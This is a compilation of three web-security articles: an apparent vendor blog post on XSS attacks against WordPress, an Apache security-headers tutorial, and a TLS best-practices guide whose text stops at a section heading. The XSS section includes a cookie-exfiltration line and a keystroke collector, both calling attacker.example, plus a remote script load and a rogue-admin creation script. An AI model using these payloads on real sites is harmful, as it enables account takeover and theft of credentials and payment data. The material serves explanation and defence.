When discussing manipulation of websites, it is hard to ignore site defacements. This is the most obvious form of attack on a website, as it is often used to replace the intended content of the website with a message from the bad actor. This is often accomplished by using JavaScript to force the bad actor’s intended content to load in place of the original site content. Utilizing JavaScript functions like document.getElementById(), or by setting window.location, it is possible to replace page elements, or even the entire page, with new content. Defacements require a stored XSS vulnerability, as the malicious actor would want to ensure that all site visitors see the defacement.

Example of XSS defacement

This is, of course, not the only way to deface a website. A defacement could be as simple as modifying elements of the page, such as changing the background color or adding text to the page. These are accomplished in much the same way, by using JavaScript to replace page elements.
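
Two minimal sketches of what such element-level tampering can look like (the element ID here is hypothetical):

// Change the page background
document.body.style.backgroundColor = 'black';
// Replace the contents of a single element
document.getElementById('content').innerHTML = '<h1>Defaced</h1>';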

Stealing Data With Cross-Site Scripting

XSS is one of the easier vulnerabilities a malicious actor can exploit in order to steal data from a website. Specially crafted URLs can be sent to administrators or other site users to add elements to the page that send form data to the malicious actor as well as, or instead of, the intended location of the data being submitted on the website under normal conditions.

The cookies generated by a website can contain sensitive data or even allow an attacker to access an authenticated user’s account directly. One of the simplest methods of viewing the active cookies on a website is to use the document.cookie JavaScript property to list all cookies. In this example, we sent the cookies to an alert box, but they can just as easily be sent to a server under the attacker’s control, without even being noticeable to the site visitor.
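
Exfiltrating cookies can be as simple as tacking them onto an image request; a sketch, where attacker.example stands in for a server the attacker controls:

// Silently send the victim's cookies to the attacker's server
new Image().src = 'https://attacker.example/steal?c=' + encodeURIComponent(document.cookie);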

Example of stealing cookies with XSS

While form data theft is less common, it can have a significant impact on site owners and visitors. The most common way this would be used by a malicious actor is to steal credit card information. It is possible to simply send input from a form directly to a server under the bad actor’s control; however, it is much more common to use a keylogger. Many payment processing solutions embed forms from their own sites, which typically cannot be directly accessed by JavaScript running in the context of an infected site. The use of a keylogger helps ensure that usable data will be received, which may not always be the case when simply collecting form data as it is submitted to the intended location.

Here we used character encoding to obfuscate the JavaScript keystroke collector, as well as to make it easy to run directly from a maliciously crafted link. This then sends collected keystrokes to a server under the threat actor’s control, where a PHP script is used to write the collected keystrokes to a log file. This technique could be used as we did here to target specific victims, or a stored XSS vulnerability could be taken advantage of in order to collect keystrokes from any site visitor who visits a page that loads the malicious JavaScript code. In either use-case, an XSS vulnerability must exist on the target website.
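
Stripped of the obfuscation described above, the collector half of such a setup can be just a few lines of JavaScript (attacker.example and the /k endpoint are placeholders):

// Bare-bones keystroke collector
document.addEventListener('keypress', function (e) {
  // Fire-and-forget request; the response is never read
  fetch('https://attacker.example/k?d=' + encodeURIComponent(e.key), { mode: 'no-cors' });
});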

Example of XSS form theft

If this form of data theft is used on a vulnerable login page, a threat actor could easily gain access to usernames and passwords that could be used in later attacks. These attacks could be against the same website, or used in credential stuffing attacks against a variety of websites such as email services and financial institutions.

Taking Advantage of Cross-Site Scripting to Take Over Accounts

Perhaps one of the most dangerous types of attacks that are possible through XSS vulnerabilities is an account takeover. This can be accomplished through a variety of methods, including the use of stolen cookies, similar to the example above. In addition to simply using cookies to access an administrator account, malicious actors will often create fake administrator accounts under their control, and may even inject backdoors into the website. Backdoors then give the malicious actor the ability to perform further actions at a later time.

If an XSS vulnerability exists on a site, injecting a malicious administrator user can be light work for a threat actor if they can get an administrator of a vulnerable website to click a link that includes an encoded payload, or if another stored XSS vulnerability can be exploited. In this example we injected the admin user by pulling the malicious code from a web-accessible location, using a common URL shortener to further hide the true location of the malicious code. That link can then be utilized in a specially crafted URL, or injected into a vulnerable form, with something like onload=jQuery.getScript('https://bit.ly/<short_code>'); to load the script that injects a malicious admin user when the page loads.
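
The fetched script itself is typically a short CSRF-style routine that runs with the victim administrator’s session. A simplified sketch of the idea (the field names follow WordPress’s user-new.php form, but treat the details as assumptions rather than the exact payload used here):

// Load the new-user form to harvest its nonce, then submit it back
jQuery.get('/wp-admin/user-new.php', function (html) {
  var nonce = jQuery(html).find('#_wpnonce_create-user').val();
  jQuery.post('/wp-admin/user-new.php', {
    action: 'createuser',
    '_wpnonce_create-user': nonce,
    user_login: 'attacker',          // hypothetical account name
    email: 'attacker@example.com',
    pass1: 'P@ssw0rd!', pass2: 'P@ssw0rd!',
    role: 'administrator'
  });
});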

Example of adding a malicious admin user with XSS

Backdoors are a way for a malicious actor to retain access to a website or system beyond the initial attack. This makes backdoors very useful for any threat actor that intends to continue modifying their attack, collect data over time, or regain access if an injected malicious admin user is removed by a site administrator. While JavaScript running in an administrator’s session can be used to add PHP backdoors to a website by editing plugin or theme files, it is also possible to “backdoor” a visitor’s browser, allowing an attacker to run arbitrary commands as the victim in real time. In this example, we used a JavaScript backdoor that could be connected to from a Python shell running on a system under the threat actor’s control. This allows the threat actor to run commands directly in the victim’s browser, allowing the attacker to directly take control of it, and potentially opening up further attacks to the victim’s computer depending on whether the browser itself has any unpatched vulnerabilities.

Often, a backdoor is used to retain access to a website or server, but what is unique about this example is the use of an XSS vulnerability in a website in order to gain access to the computer being used to access the affected website. If a threat actor can get the JavaScript payload to load any time a visitor accesses a page, such as through a stored XSS vulnerability, then any visitor to that page on the website becomes a potential victim.

Example of a XSS backdoor

Tools Make Light Work of Exploits

There are tools available that make it easy to exploit vulnerabilities like Cross-Site Scripting (XSS). Some tools are created by malicious actors for malicious actors, while others are created by cybersecurity professionals for the purpose of testing for vulnerabilities in order to prevent the possibility of an attack. No matter what the purpose of the tool is, if it works, malicious actors will use it. One such tool is a freely available penetration testing tool called BeEF. This tool is designed to work with a browser to find client-side vulnerabilities in a web app. This tool is great for administrators, as it allows them to easily test their own web apps for XSS and other client-side vulnerabilities that may be present. The flip side is that it can also be used by threat actors looking for potential attack targets.

One thing that is consistent in all of these exploits is the use of requests to manipulate the website. These requests can be logged and used to block malicious actions based on the request parameters and the strings contained within the request. The one exception is DOM-based XSS, which cannot be logged on the web server, as it is processed entirely within the victim’s browser. The request parameters that malicious actors typically use in their requests are often common fields, such as the WordPress search parameter $_GET['s'], and are often just guesswork hoping to find a common parameter with an exploitable vulnerability. The most common request parameter we have seen threat actors attempting to attack recently is $_GET['url'], which is typically used to identify the domain name of the server the website is loaded from.

Top 10 parameters in XSS attacks

Conclusion

Cross-Site Scripting (XSS) is a powerful, yet often underrated, type of vulnerability, at least when it comes to WordPress instances. While XSS has been a long-standing entry in the OWASP Top 10, many people think of it only as the ability to inject content like a popup. Few realize that a malicious actor could use this type of vulnerability to inject spam into a web page or redirect a visitor to the website of their choice, convince a site visitor to provide their username and password, or even take over the website with relative ease, all thanks to the capabilities of JavaScript and working knowledge of the backend platform.

One of the best ways to protect your website against XSS vulnerabilities is to keep WordPress and all of your plugins updated. Sometimes attackers target a zero-day vulnerability, and a patch is not available immediately, which is why the Wordfence firewall comes with built-in XSS protection to protect all Wordfence users, including Free, Premium, Care, and Response, against XSS exploits. If you believe your site has been compromised as a result of an XSS vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.

Source :
https://www.wordfence.com/blog/2022/09/cross-site-scripting-the-real-wordpress-supervillain/

Seven Important Security Headers for Your Website

When it comes to securing your website, it’s all about minimizing attack surface and adding more layers of security. One strong layer that you can (and should) add is proper HTTP security headers. When responding to requests, your server should include security headers that help stop unwanted activity like XSS, MITM, and clickjacking attacks. While sending security headers does not guarantee 100% defense against all such attacks, it does help modern browsers keep things secure. So in this tutorial, we walk through seven of the most important and effective HTTP security headers to add a strong layer of security to your Apache-powered website.

Note: You can verify your site’s security headers using a free online tool such as the one provided by SecurityHeaders.com.
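
You can also spot-check the headers from the command line; a quick sketch using curl (replace example.com with your own domain):

curl -sI https://example.com | grep -iE 'x-xss|x-frame|x-content-type|strict-transport|referrer|feature|content-security'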

X-XSS-Protection

The X-XSS-Protection security header enables the XSS filter provided by some web browsers (IE8+ and older versions of Chrome and Safari). Note that most modern browsers have since retired this built-in filter, so the header mainly benefits older clients. Here is the recommended configuration for this header:

# X-XSS-Protection
<IfModule mod_headers.c>
	Header set X-XSS-Protection "1; mode=block"
</IfModule>

Added to your site’s .htaccess file or server configuration file, this code instructs supportive browsers to block the rendering of a page when a reflected malicious script is detected. For more configuration options and further information about X-XSS-Protection, check out these resources:

X-Frame-Options

The X-Frame-Options (XFO) security header helps modern web browsers protect your visitors against clickjacking and other threats. Here is the recommended configuration for this header:

# X-Frame-Options
<IfModule mod_headers.c>
	Header set X-Frame-Options "SAMEORIGIN"
</IfModule>

Added to your site’s .htaccess file or server configuration file, this code instructs supportive browsers to block any frames/content requested from external locations. So if your own site includes an iframe that loads a resource from the same domain, the content will load normally. But if any iframe is included that loads resources from any other domain, the content will be blocked. For more configuration options and further information about X-Frame-Options, check out these resources:

X-Content-Type-Options

The X-Content-Type-Options security header enables supportive browsers to protect against MIME-type sniffing exploits. It does this by disabling the browser’s MIME sniffing feature, and forcing it to recognize the MIME type sent by the server. This header supports a single directive, nosniff, and the standard implementation looks like this:

# X-Content-Type-Options
<IfModule mod_headers.c>
	Header set X-Content-Type-Options "nosniff"
</IfModule>

Added to your site’s .htaccess file or server configuration file, this code instructs supportive browsers to use the MIME type declared by the origin server. There are a couple of precautions to keep in mind. First, as with any security header, it does not stop 100% of all attacks or threats; it does stop some of them, however, and thus provides another layer of protection for your site. Also note that while this header originally shipped only in Chrome and Internet Explorer, it is now supported by all major modern browsers. For more configuration options and further information about X-Content-Type-Options, check out these resources:

Strict-Transport-Security

The Strict-Transport-Security (HSTS) header instructs modern browsers to always connect via HTTPS (secure connection via SSL/TLS), and never connect via insecure HTTP (non-SSL) protocol. While there are variations to how this header is configured, the most common implementation looks like this:

# Strict-Transport-Security
<IfModule mod_headers.c>
	Header always set Strict-Transport-Security "max-age=63072000; includeSubDomains"
</IfModule>

Added to your site’s .htaccess file or server configuration file, this code instructs supportive browsers to always use HTTPS for connections. This helps stop man-in-the-middle (MITM) and other attacks targeting insecure HTTP connections. For more configuration options and further information about Strict-Transport-Security, check out these resources:

Referrer-Policy

The Referrer-Policy security header instructs modern browsers how to handle or exclude the Referer header (yes, the header name normally is spelled incorrectly, missing an “r”). For those who may not be familiar, the Referer header contains information about where a request is coming from. So for example if you are at example.com and click a link from there to domain.tld, the Referer header would specify example.com as the “referring” URL.

With that in mind, the Referrer-Policy enables you to control whether or not the Referer header is included with the request. Here is an example showing how to add the Referrer-Policy header via Apache:

# Referrer-Policy
<IfModule mod_headers.c>
	Header set Referrer-Policy "same-origin"
</IfModule>

Added to your site’s .htaccess file or server configuration file, this code instructs supportive browsers to send the Referer header only for requests within the current domain (same-origin). Keep in mind that this header is less about security and more about controlling referrer information, as required by various rules and regulations (e.g., GDPR). For more configuration options and further information about Referrer-Policy, check out these resources:

Feature-Policy

The Feature-Policy header tells modern browsers which browser features are allowed. For example, if you want to ensure that only geolocation and vibrate features are allowed, you can configure the Feature-Policy header accordingly. It also enables you to control the origin for each specified feature. (Note that newer browsers are replacing Feature-Policy with the Permissions-Policy header, which uses a different syntax.) Here is an example showing how to add a Feature-Policy header via Apache:

# Feature-Policy
<IfModule mod_headers.c>
	Header set Feature-Policy "geolocation 'self'; vibrate 'none'"
</IfModule>

Added to your site’s .htaccess file or server configuration file, this code instructs supportive browsers to enable only the geolocation and vibrate features. Keep in mind that this header is less about security and more about ensuring a smooth experience for your users. For more configuration options and further information about Feature-Policy, check out these resources:

Content-Security-Policy

The Content-Security-Policy (CSP) header tells modern browsers which dynamic resources are allowed to load. This header is especially helpful at stopping XSS attacks and other malicious activity. This header provides extensive configuration options, which will need to be fine-tuned to match the specific resources required by your site. Otherwise if the header configuration does not match your site’s requirements, some resources may not load (or work) properly.

Because of this, there isn’t one most common example to look at. So instead here are a few different examples, each allowing different types of resources.

Example 1

First example, here is a CSP directive that allows resources from a CDN, and disallows any framed content or media plugins. This example is from the Google docs page linked below.

# Content-Security-Policy - Example 1
<IfModule mod_headers.c>
	Header set Content-Security-Policy "default-src https://cdn.example.com; child-src 'none'; object-src 'none'"
</IfModule>

Example 2

Second example, this CSP directive enables script resources loaded from a jQuery subdomain, and limits stylesheets and images to the current domain (self). This example is from the Mozilla docs page linked below.

# Content-Security-Policy - Example 2
<IfModule mod_headers.c>
	Header set Content-Security-Policy "default-src 'none'; img-src 'self'; script-src 'self' https://code.jquery.com; style-src 'self'"
</IfModule>

Example 3

And for a third example, here is the directive I use on most of my WordPress-powered sites. Logically these sites tend to use the same types of resources, so I can keep things simple and use the following code on all sites:

# Content-Security-Policy - Example 3
<IfModule mod_headers.c>
	Header set Content-Security-Policy "default-src https:; font-src https: data:; img-src https: data:; script-src https:; style-src https:;"
</IfModule>

To get a better idea of what’s happening here, let’s apply a bit of formatting to the code:

Header set Content-Security-Policy "

default-src https:; 
font-src    https: data:; 
img-src     https: data:; 
script-src  https:; 
style-src   https:;

"

Stare at that for a few moments and you should get the idea: the header is setting the allowed source(s) for fonts, images, scripts, and styles. For each of these, a secure HTTPS connection is required. The only exception is that data URIs also are allowed as a source for fonts and images.

So for any of these examples, when added to your site’s .htaccess file or server configuration file, the code tells supportive browsers which dynamic resources are allowed and/or not allowed. But seriously, if you’re thinking about adding the powerful Content-Security-Policy security header, take a few moments to read through some of the documentation:

Where to get help with CSP

Yes CSP can be confusing, but there is no reason to despair. There are numerous online tools that make it easier to figure out how to implement CSP; a quick search for “csp test online” yields many results.

Even better, there now are “CSP generators” that literally write the code for you based on your input variables.

There are lots of useful tools out there to make CSP easier. Just enter your infos and copy/paste the results. If in doubt, use multiple tools and compare the results; the code should be the same. If not, don’t hesitate to reach out to the tool providers, who will be able to answer any questions, etc.

All Together

For the sake of easy copy/pasting, here is a code snippet that combines all of the above-described security headers.

Important: before adding this code to your site, make sure to read through each technique as explained in corresponding sections above. There may be important notes and information that you need to understand regarding each particular directive included in this code snippet.

# Security Headers
<IfModule mod_headers.c>
	Header set X-XSS-Protection "1; mode=block"
	Header set X-Frame-Options "SAMEORIGIN"
	Header set X-Content-Type-Options "nosniff"
	Header always set Strict-Transport-Security "max-age=63072000; includeSubDomains"
	# Header set Content-Security-Policy ...
	Header set Referrer-Policy "same-origin"
	Header set Feature-Policy "geolocation 'self'; vibrate 'none'"
</IfModule>

As with each of the above techniques, this code may be added to your site via .htaccess or Apache config. Understand that this technique includes commonly used configurations for each of the included headers. You can (and should) go through each one to make sure that the configuration matches the requirements and goals of your site. Also remember to test thoroughly before going live.

Note: Notice the following line in the above “Security Headers” code snippet:

# Header set Content-Security-Policy ...

The pound sign (or hash tag, or whatever you want to call it) means that the line is disabled and ignored by the server. This means that the Content-Security-Policy directive is “commented out” and thus not active in this technique. Why? Because as explained previously, there is no recommended “one-size-fits-all” CSP example that works perfectly in all websites. Instead, you will need to replace the commented-out line with your own properly configured CSP header, as explained above.

SSL and TLS Deployment Best Practices

Version 1.6-draft (15 January 2020)

SSL/TLS is a deceptively simple technology. It is easy to deploy, and it just works, except when it does not. The main problem is that encryption is often not easy to deploy correctly. To ensure that TLS provides the necessary security, system administrators and developers must put extra effort into properly configuring their servers and developing their applications.

In 2009, we began our work on SSL Labs because we wanted to understand how TLS was used and to remedy the lack of easy-to-use TLS tools and documentation. We have achieved some of our goals through our global surveys of TLS usage, as well as the online assessment tool, but the lack of documentation is still evident. This document is a step toward addressing that problem.

Our aim here is to provide clear and concise instructions to help overworked administrators and programmers spend the minimum time possible to deploy a secure site or web application. In pursuit of clarity, we sacrifice completeness, foregoing certain advanced topics. The focus is on advice that is practical and easy to follow. For those who want more information, Section 6 gives useful pointers.

1 Private Key and Certificate

In TLS, all security starts with the server’s cryptographic identity; a strong private key is needed to prevent attackers from carrying out impersonation attacks. Equally important is to have a valid and strong certificate, which grants the private key the right to represent a particular hostname. Without these two fundamental building blocks, nothing else can be secure.

1.1 Use 2048-Bit Private Keys

For most web sites, security provided by 2,048-bit RSA keys is sufficient. The RSA public key algorithm is widely supported, which makes keys of this type a safe default choice. At 2,048 bits, such keys provide about 112 bits of security. If you want more security than this, note that RSA keys don’t scale very well. To get 128 bits of security, you need 3,072-bit RSA keys, which are noticeably slower. ECDSA keys provide an alternative that offers better security and better performance. At 256 bits, ECDSA keys provide 128 bits of security. A small number of older clients don’t support ECDSA, but modern clients do. It’s possible to get the best of both worlds and deploy with RSA and ECDSA keys simultaneously if you don’t mind the overhead of managing such a setup.
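
Generating either key type is a one-liner with OpenSSL; a quick sketch (the file names are placeholders):

# 2,048-bit RSA private key
openssl genrsa -out rsa.key 2048

# 256-bit ECDSA private key on the P-256 curve
openssl ecparam -genkey -name prime256v1 -noout -out ecdsa.key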

1.2 Protect Private Keys

Treat your private keys as an important asset, restricting access to the smallest possible group of employees while still keeping your arrangements practical. Recommended policies include the following:

  • Generate private keys on a trusted computer with sufficient entropy. Some CAs offer to generate private keys for you; run away from them.
  • Password-protect keys from the start to prevent compromise when they are stored in backup systems. Private key passwords don’t help much in production because a knowledgeable attacker can always retrieve the keys from process memory. There are hardware devices (called Hardware Security Modules, or HSMs) that can protect private keys even in the case of server compromise, but they are expensive and thus justifiable only for organizations with strict security requirements.
  • After compromise, revoke old certificates and generate new keys.
  • Renew certificates yearly, and more often if you can automate the process. Most sites should assume that a compromised certificate will be impossible to revoke reliably; certificates with shorter lifespans are therefore more secure in practice.
  • Unless keeping the same keys is important for public key pinning, you should also generate new private keys whenever you’re getting a new certificate.

1.3 Ensure Sufficient Hostname Coverage

Ensure that your certificates cover all the names you wish to use with a site. Your goal is to avoid invalid certificate warnings, which confuse users and weaken their confidence.

Even when you expect to use only one domain name, remember that you cannot control how your users arrive at the site or how others link to it. In most cases, you should ensure that the certificate works with and without the www prefix (e.g., that it works for both example.com and www.example.com). The rule of thumb is that a secure web server should have a certificate that is valid for every DNS name configured to point to it.
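
With OpenSSL 1.1.1 or newer, you can request both names in a single CSR via the subjectAltName extension; a sketch with placeholder names:

openssl req -new -key rsa.key -out example.csr \
  -subj "/CN=example.com" \
  -addext "subjectAltName=DNS:example.com,DNS:www.example.com"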

Wildcard certificates have their uses, but avoid using them if it means exposing the underlying keys to a much larger group of people, and especially if doing so crosses team or department boundaries. In other words, the fewer people there are with access to the private keys, the better. Also be aware that certificate sharing creates a bond that can be abused to transfer vulnerabilities from one web site or server to all other sites and servers that use the same certificate (even when the underlying private keys are different).

Make sure you add all the necessary domain names to the Subject Alternative Name (SAN) field, since the latest browsers no longer check the Common Name during validation.

1.4 Obtain Certificates from a Reliable CA

Select a Certification Authority (CA) that is reliable and serious about its certificate business and security. Consider the following criteria when selecting your CA:

Security posture: All CAs undergo regular audits, but some are more serious about security than others. Figuring out which ones are better in this respect is not easy, but one option is to examine their security history and, more importantly, how they have reacted to compromises and whether they have learned from their mistakes.

Business focus: CAs whose certificate business constitutes a substantial part of their activities have everything to lose if something goes terribly wrong, and they probably won’t neglect their certificate division by chasing potentially more lucrative opportunities elsewhere.

Services offered: At a minimum, your selected CA should provide support for both Certificate Revocation List (CRL) and Online Certificate Status Protocol (OCSP) revocation methods, with rock-solid network availability and performance. Many sites are happy with domain-validated certificates, but you also should consider if you’ll ever require Extended Validation (EV) certificates. In either case, you should have a choice of public key algorithm. Most web sites use RSA today, but ECDSA may become important in the future because of its performance advantages.

Certificate management options If you need a large number of certificates and operate in a complex environment, choose a CA that will give you good tools to manage them.

Support Choose a CA that will give you good support if and when you need it.

Note

For best results, acquire your certificates well in advance and at least one week before deploying them to production. This practice (1) helps avoid certificate warnings for some users who don’t have the correct time on their computers and (2) helps avoid failed revocation checks with CAs who need extra time to propagate new certificates as valid to their OCSP responders. Over time, try to extend this “warm-up” period to 1-3 months. Similarly, don’t wait until your certificates are about to expire to replace them; leaving a buffer of several months helps users whose clocks are incorrect in the other direction.

1.5 Use Strong Certificate Signature Algorithms

Certificate security depends on (1) the strength of the private key that was used to sign the certificate and (2) the strength of the hashing function used in the signature. Until recently, most certificates relied on the SHA1 hashing function, which is now considered insecure. As a result, we’re currently in transition to SHA256. As of January 2016, you shouldn’t be able to get a SHA1 certificate from a public CA. Leaf and intermediate certificates with SHA1 signatures are now considered insecure by browsers.
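
As a quick check, the signature algorithm of an existing certificate can be read with OpenSSL (the file name is hypothetical); anything reporting sha1WithRSAEncryption should be replaced:

# Show the certificate's signature algorithm
openssl x509 -in example.crt -noout -text | grep "Signature Algorithm"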

1.6 Use DNS CAA

DNS CAA[8] is a standard that allows domain name owners to restrict which CAs can issue certificates for their domains. In September 2017, the CA/Browser Forum mandated CAA support as part of its Baseline Requirements for certificate issuance. With CAA in place, the attack surface for fraudulent certificates is reduced, effectively making sites more secure. CAs with automated issuance processes should check for a DNS CAA record before issuing, as this reduces improper issuance of certificates.

It is recommended that you whitelist CAs by adding CAA records for your domain; add only the CAs you trust to issue your certificates, as in the example below.
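
For illustration, the following hypothetical zone-file entries restrict issuance for a domain to a single CA and request reports of violating requests (the CA domain is a placeholder; use the identifier published by your CA):

example.com.  IN  CAA 0 issue "ca.example.net"
example.com.  IN  CAA 0 iodef "mailto:security@example.com"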

2 Configuration

With correct TLS server configuration, you ensure that your credentials are properly presented to the site’s visitors, that only secure cryptographic primitives are used, and that all known weaknesses are mitigated.

2.1 Use Complete Certificate Chains

In most deployments, the server certificate alone is insufficient; two or more certificates are needed to build a complete chain of trust. A common configuration problem occurs when deploying a server with a valid certificate, but without all the necessary intermediate certificates. To avoid this situation, simply use all the certificates provided to you by your CA in the same sequence.
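
For a typical PEM-based deployment, this amounts to concatenating the certificates in order, server certificate first (the file names are hypothetical; the root certificate itself does not need to be included):

# Leaf certificate first, then intermediates, in order
cat example.crt intermediate.crt > chain.pem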

An invalid certificate chain effectively renders the server certificate invalid and results in browser warnings. In practice, this problem is sometimes difficult to diagnose because some browsers can reconstruct incomplete chains and some can’t. All browsers tend to cache and reuse intermediate certificates.

2.2 Use Secure Protocols

There are six protocols in the SSL/TLS family: SSL v2, SSL v3, TLS v1.0, TLS v1.1, TLS v1.2, and TLS v1.3:

  • SSL v2 is insecure and must not be used. This protocol version is so bad that it can be used to attack RSA keys and sites with the same name even if they are on entirely different servers (the DROWN attack).
  • SSL v3 is insecure when used with HTTP (the SSLv3 POODLE attack) and weak when used with other protocols. It’s also obsolete and shouldn’t be used.
  • TLS v1.0 and TLS v1.1 are legacy protocols that shouldn’t be used, but supporting them is sometimes still necessary in practice. Their major weakness (BEAST) has been mitigated in modern browsers, but other problems remain. TLS v1.0 has been deprecated by PCI DSS, and modern browsers deprecated both TLS v1.0 and TLS v1.1 in January 2020; see the SSL Labs blog for details.
  • TLS v1.2 and v1.3 are both without known security issues.

TLS v1.2 or TLS v1.3 should be your main protocol because these versions offer modern authenticated encryption (also known as AEAD). If you don’t support TLS v1.2 or TLS v1.3 today, your security is lacking.

In order to support older clients, you may need to continue to support TLS v1.0 and TLS v1.1 for now. However, you should plan to retire TLS v1.0 and TLS v1.1 in the near future. For example, the PCI DSS standard will require all sites that accept credit card payments to remove support for TLS v1.0 by June 2018. Similarly, modern browsers will remove the support for TLS v1.0 and TLS v1.1 by January 2020.
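
As a minimal sketch, assuming Apache httpd with mod_ssl (version 2.4.37 or later with OpenSSL 1.1.1 is needed for TLS v1.3 support), the protocol versions can be restricted as follows:

# Disable all protocol versions, then re-enable only TLS v1.2 and v1.3
SSLProtocol -all +TLSv1.2 +TLSv1.3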

Benefits of using TLS v1.3:

  • Improved performance, i.e., reduced handshake latency
  • Improved security
  • Removal of obsolete and insecure features such as weak cipher suites and compression

2.3 Use Secure Cipher Suites

To communicate securely, you must first ascertain that you are communicating directly with the desired party (and not through someone else who will eavesdrop) and exchanging data securely. In SSL and TLS, cipher suites define how secure communication takes place. They are composed from varying building blocks with the idea of achieving security through diversity. If one of the building blocks is found to be weak or insecure, you should be able to switch to another.

You should rely chiefly on the AEAD suites that provide strong authentication and key exchange, forward secrecy, and encryption of at least 128 bits. Some other, weaker suites may still be supported, provided they are negotiated only with older clients that don’t support anything better.

There are several obsolete cryptographic primitives that must be avoided:

  • Anonymous Diffie-Hellman (ADH) suites do not provide authentication.
  • NULL cipher suites provide no encryption.
  • Export cipher suites are insecure when negotiated in a connection, but they can also be used against a server that prefers stronger suites (the FREAK attack).
  • Suites with weak ciphers (112 bits or less) use encryption that can easily be broken and are insecure.
  • RC4 is insecure.
  • 64-bit block ciphers (3DES, DES, RC2, IDEA) are weak.
  • Cipher suites with the RSA key exchange (i.e., TLS_RSA suites) are weak because they do not provide forward secrecy.

There are several cipher suites that should be preferred:

  • AEAD (Authenticated Encryption with Associated Data) cipher suites – CHACHA20_POLY1305, GCM and CCM
  • PFS (Perfect Forward Secrecy) ciphers – ECDHE_RSA, ECDHE_ECDSA, DHE_RSA, DHE_DSS, CECPQ1 and all TLS 1.3 ciphers

Use the following suite configuration, designed for both RSA and ECDSA keys, as your starting point:

TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA
TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256
TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384
TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
TLS_DHE_RSA_WITH_AES_128_CBC_SHA
TLS_DHE_RSA_WITH_AES_256_CBC_SHA
TLS_DHE_RSA_WITH_AES_128_CBC_SHA256
TLS_DHE_RSA_WITH_AES_256_CBC_SHA256

Warning

We recommend that you always first test your TLS configuration in a staging environment, transferring the changes to the production environment only when certain that everything works as expected. Please note that the above is a generic list and that not all systems (especially the older ones) support all the suites. That’s why it’s important to test first.

The above example configuration uses standard TLS suite names. Some platforms use nonstandard names; please refer to the documentation for your platform for more details. For example, the following suite names would be used with OpenSSL:

ECDHE-ECDSA-AES128-GCM-SHA256
ECDHE-ECDSA-AES256-GCM-SHA384
ECDHE-ECDSA-AES128-SHA
ECDHE-ECDSA-AES256-SHA
ECDHE-ECDSA-AES128-SHA256
ECDHE-ECDSA-AES256-SHA384
ECDHE-RSA-AES128-GCM-SHA256
ECDHE-RSA-AES256-GCM-SHA384
ECDHE-RSA-AES128-SHA
ECDHE-RSA-AES256-SHA
ECDHE-RSA-AES128-SHA256
ECDHE-RSA-AES256-SHA384
DHE-RSA-AES128-GCM-SHA256
DHE-RSA-AES256-GCM-SHA384
DHE-RSA-AES128-SHA
DHE-RSA-AES256-SHA
DHE-RSA-AES128-SHA256
DHE-RSA-AES256-SHA256
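
As a sketch, assuming Apache httpd with mod_ssl, an OpenSSL-style list such as the one above is deployed by joining the names with colons (abbreviated here for brevity):

SSLCipherSuite ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384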

2.4 Select Best Cipher Suites

In SSL v3 and later protocol versions, clients submit a list of cipher suites that they support, and servers choose one suite from the list to use for the connection. Not all servers do this well, however; some will select the first supported suite from the client’s list. Having servers actively select the best available cipher suite is critical for achieving the best security.
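
Assuming Apache httpd with mod_ssl, active server-side selection is enabled with a single directive; most other servers have an equivalent setting:

# Prefer the server's cipher suite order over the client's
SSLHonorCipherOrder on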

2.5 Use Forward Secrecy

Forward secrecy (sometimes also called perfect forward secrecy) is a protocol feature that enables secure conversations that are not dependent on the server’s private key. With cipher suites that do not provide forward secrecy, someone who can recover a server’s private key can decrypt all earlier recorded encrypted conversations. You need to support and prefer ECDHE suites in order to enable forward secrecy with modern web browsers. To support a wider range of clients, you should also use DHE suites as fallback after ECDHE. Avoid the RSA key exchange unless absolutely necessary. My proposed default configuration in Section 2.3 contains only suites that provide forward secrecy.

2.6 Use Strong Key Exchange

For the key exchange, public sites can typically choose between the classic ephemeral Diffie-Hellman key exchange (DHE) and its elliptic curve variant, ECDHE. There are other key exchange algorithms, but they’re generally insecure in one way or another. The RSA key exchange is still very popular, but it doesn’t provide forward secrecy.

In 2015, a group of researchers published new attacks against DHE; their work is known as the Logjam attack.[2] The researchers discovered that lower-strength DH key exchanges (e.g., 768 bits) can easily be broken and that some well-known 1,024-bit DH groups can be broken by state agencies. To be on the safe side, if deploying DHE, configure it with at least 2,048 bits of security. Some older clients (e.g., Java 6) might not support this level of strength. For performance reasons, most servers should prefer ECDHE, which is both stronger and faster. The secp256r1 named curve (also known as P-256) is a good choice in this case.
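
If you do deploy DHE, here is a sketch of generating and activating a 2,048-bit DH group, assuming OpenSSL and Apache httpd 2.4.8 or later (the file path is hypothetical):

# Generate 2,048-bit Diffie-Hellman parameters (this can take a while)
openssl dhparam -out /etc/ssl/dhparams.pem 2048

# In the Apache configuration, point mod_ssl at the generated parameters
SSLOpenSSLConfCmd DHParameters /etc/ssl/dhparams.pem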

2.7 Mitigate Known Problems

There have been several serious attacks against SSL and TLS in recent years, but they should generally not concern you if you’re running up-to-date software and following the advice in this guide. (If you’re not, I’d advise testing your systems using SSL Labs and taking it from there.) However, nothing is perfectly secure, which is why it is a good practice to keep an eye on what happens in security. Promptly apply vendor patches if and when they become available; otherwise, rely on workarounds for mitigation.

3 Performance

Security is our main focus in this guide, but we must also pay attention to performance; a secure service that does not satisfy performance criteria will no doubt be dropped. With proper configuration, TLS can be quite fast. With modern protocols—for example, HTTP/2—it might even be faster than plaintext communication.

3.1 Avoid Too Much Security

